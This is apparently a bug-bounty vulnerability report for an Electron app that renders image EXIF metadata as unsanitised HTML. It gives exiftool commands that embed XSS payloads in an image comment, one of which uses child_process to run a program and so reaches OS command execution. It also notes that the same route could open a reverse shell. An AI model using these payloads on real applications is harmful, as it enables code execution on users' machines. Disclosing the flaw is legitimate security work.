vulnerability os command injection (cwe-78)
severity 8.6
language typescript
registry other

✍️ Description

Command Injection using XSS via EXIF Data.

The application displays the image metadata in HTML format without removing malicious tags, therefore an XSS attack can be performed.

exiftool -Comment='</strong><img src=x onerror=alert(1) /><b>OverJT</b>' MY_IMAGE.png

Being an application made in electron, it allows to easily scale the XSS to a OS code execution attack through the child-process module.

🕵️‍♂️ Proof of Concept

exiftool -Comment='</strong><img src=x onerror=window.require("child_process").execFile("/usr/bin/firefox") /><b>OverJT</b>' MY_IMAGE.png

💥 Impact

An attacker can create an image with malicious metadata to run a reverse shell